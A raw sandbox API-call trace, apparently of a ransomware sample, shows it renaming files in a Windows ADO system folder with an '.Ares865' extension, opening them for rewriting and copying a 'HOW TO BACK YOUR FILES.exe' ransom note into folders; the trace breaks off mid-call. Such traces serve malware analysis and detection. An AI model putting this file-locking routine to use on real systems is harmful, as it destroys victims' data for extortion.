lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x534bf800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0146.768] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0146.768] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7465328, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb7465328, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5fb141f0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0146.768] lstrcmpiW (lpString1="msader15.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0146.768] lstrcmpiW (lpString1="msader15.dll", lpString2="aoldtz.exe") returned 1 [0146.768] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msader15.dll" | out: lpString1="msader15.dll") returned="msader15.dll" [0146.768] lstrlenW (lpString="msader15.dll") returned 12 [0146.768] lstrlenW (lpString="Ares865") returned 7 [0146.768] lstrcmpiW (lpString1="r15.dll", lpString2="Ares865") returned 1 [0146.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.Ares865") returned 67 [0146.768] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll.ares865"), dwFlags=0x1) returned 1 [0146.770] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.773] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado15.dll" | out: lpString1="msado15.dll") returned="msado15.dll" [0146.773] lstrlenW (lpString="msado15.dll") returned 11 [0146.773] lstrlenW (lpString="Ares865") returned 7 [0146.773] lstrcmpiW (lpString1="o15.dll", lpString2="Ares865") returned 1 [0146.774] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.Ares865") returned 66 [0146.774] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll.ares865"), dwFlags=0x1) returned 1 [0146.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1019904) returned 1 [0146.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.847] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado20.tlb" | out: lpString1="msado20.tlb") returned="msado20.tlb" [0146.847] lstrlenW (lpString="msado20.tlb") returned 11 [0146.847] lstrlenW (lpString="Ares865") returned 7 [0146.847] lstrcmpiW (lpString1="o20.tlb", lpString2="Ares865") returned 1 [0146.847] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.Ares865") returned 66 [0146.847] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb.ares865"), dwFlags=0x1) returned 1 [0146.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.850] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69632) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.857] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado21.tlb" | out: lpString1="msado21.tlb") returned="msado21.tlb" [0146.857] lstrlenW (lpString="msado21.tlb") returned 11 [0146.857] lstrlenW (lpString="Ares865") returned 7 [0146.857] lstrcmpiW (lpString1="o21.tlb", lpString2="Ares865") returned 1 [0146.857] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.Ares865") returned 66 [0146.857] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb.ares865"), dwFlags=0x1) returned 1 [0146.859] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.859] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73728) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.870] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado25.tlb" | out: lpString1="msado25.tlb") returned="msado25.tlb" [0146.870] lstrlenW (lpString="msado25.tlb") returned 11 [0146.870] lstrlenW (lpString="Ares865") returned 7 [0146.870] lstrcmpiW (lpString1="o25.tlb", lpString2="Ares865") returned 1 [0146.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.Ares865") returned 66 [0146.870] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb.ares865"), dwFlags=0x1) returned 1 [0146.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0146.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.886] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado26.tlb" | out: lpString1="msado26.tlb") returned="msado26.tlb" [0146.887] lstrlenW (lpString="msado26.tlb") returned 11 [0146.887] lstrlenW (lpString="Ares865") returned 7 [0146.887] lstrcmpiW (lpString1="o26.tlb", lpString2="Ares865") returned 1 [0146.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.Ares865") returned 66 [0146.887] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb.ares865"), dwFlags=0x1) returned 1 [0146.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.889] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98304) returned 1 [0146.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.898] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado27.tlb" | out: lpString1="msado27.tlb") returned="msado27.tlb" [0146.898] lstrlenW (lpString="msado27.tlb") returned 11 [0146.898] lstrlenW (lpString="Ares865") returned 7 [0146.898] lstrcmpiW (lpString1="o27.tlb", lpString2="Ares865") returned 1 [0146.898] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.Ares865") returned 66 [0146.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb.ares865"), dwFlags=0x1) returned 1 [0146.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.900] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98304) returned 1 [0146.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.908] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msado28.tlb" | out: lpString1="msado28.tlb") returned="msado28.tlb" [0146.909] lstrlenW (lpString="msado28.tlb") returned 11 [0146.909] lstrlenW (lpString="Ares865") returned 7 [0146.909] lstrcmpiW (lpString1="o28.tlb", lpString2="Ares865") returned 1 [0146.909] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.Ares865") returned 66 [0146.909] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb.ares865"), dwFlags=0x1) returned 1 [0146.910] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.911] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98304) returned 1 [0146.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.919] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msadomd.dll" | out: lpString1="msadomd.dll") returned="msadomd.dll" [0146.919] lstrlenW (lpString="msadomd.dll") returned 11 [0146.919] lstrlenW (lpString="Ares865") returned 7 [0146.919] lstrcmpiW (lpString1="omd.dll", lpString2="Ares865") returned 1 [0146.919] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.Ares865") returned 66 [0146.919] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll.ares865"), dwFlags=0x1) returned 1 [0146.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.921] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=352256) returned 1 [0146.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.984] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msadomd28.tlb" | out: lpString1="msadomd28.tlb") returned="msadomd28.tlb" [0146.984] lstrlenW (lpString="msadomd28.tlb") returned 13 [0146.984] lstrlenW (lpString="Ares865") returned 7 [0146.984] lstrcmpiW (lpString1="d28.tlb", lpString2="Ares865") returned 1 [0146.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.Ares865") returned 68 [0146.985] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb.ares865"), dwFlags=0x1) returned 1 [0146.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.991] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20480) returned 1 [0146.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.994] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msador15.dll" | out: lpString1="msador15.dll") returned="msador15.dll" [0146.995] lstrlenW (lpString="msador15.dll") returned 12 [0146.995] lstrlenW (lpString="Ares865") returned 7 [0146.995] lstrcmpiW (lpString1="r15.dll", lpString2="Ares865") returned 1 [0146.995] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.Ares865") returned 67 [0146.995] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll.ares865"), dwFlags=0x1) returned 1 [0146.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.997] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57344) returned 1 [0146.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.007] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msadox.dll" | out: lpString1="msadox.dll") returned="msadox.dll" [0147.007] lstrlenW (lpString="msadox.dll") returned 10 [0147.007] lstrlenW (lpString="Ares865") returned 7 [0147.007] lstrcmpiW (lpString1="dox.dll", lpString2="Ares865") returned 1 [0147.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.Ares865") returned 65 [0147.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll.ares865"), dwFlags=0x1) returned 1 [0147.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=372736) returned 1 [0147.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0147.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.040] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msadox28.tlb" | out: lpString1="msadox28.tlb") returned="msadox28.tlb" [0147.040] lstrlenW (lpString="msadox28.tlb") returned 12 [0147.040] lstrlenW (lpString="Ares865") returned 7 [0147.040] lstrcmpiW (lpString1="x28.tlb", lpString2="Ares865") returned 1 [0147.040] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.Ares865") returned 67 [0147.040] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb.ares865"), dwFlags=0x1) returned 1 [0147.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0147.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0147.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.047] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msadrh15.dll" | out: lpString1="msadrh15.dll") returned="msadrh15.dll" [0147.047] lstrlenW (lpString="msadrh15.dll") returned 12 [0147.047] lstrlenW (lpString="Ares865") returned 7 [0147.047] lstrcmpiW (lpString1="h15.dll", lpString2="Ares865") returned 1 [0147.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.Ares865") returned 67 [0147.047] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll.ares865"), dwFlags=0x1) returned 1 [0147.049] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.049] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81920) returned 1 [0147.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0147.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.055] lstrcpyW (in: lpString1=0x2cce45e, lpString2="msjro.dll" | out: lpString1="msjro.dll") returned="msjro.dll" [0147.055] lstrlenW (lpString="msjro.dll") returned 9 [0147.056] lstrlenW (lpString="Ares865") returned 7 [0147.056] lstrcmpiW (lpString1="jro.dll", lpString2="Ares865") returned 1 [0147.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.Ares865") returned 64 [0147.056] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll.ares865"), dwFlags=0x1) returned 1 [0147.059] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.059] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0147.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0147.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.072] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" [0147.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0147.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0147.072] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned 52 [0147.072] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" [0147.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.073] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to 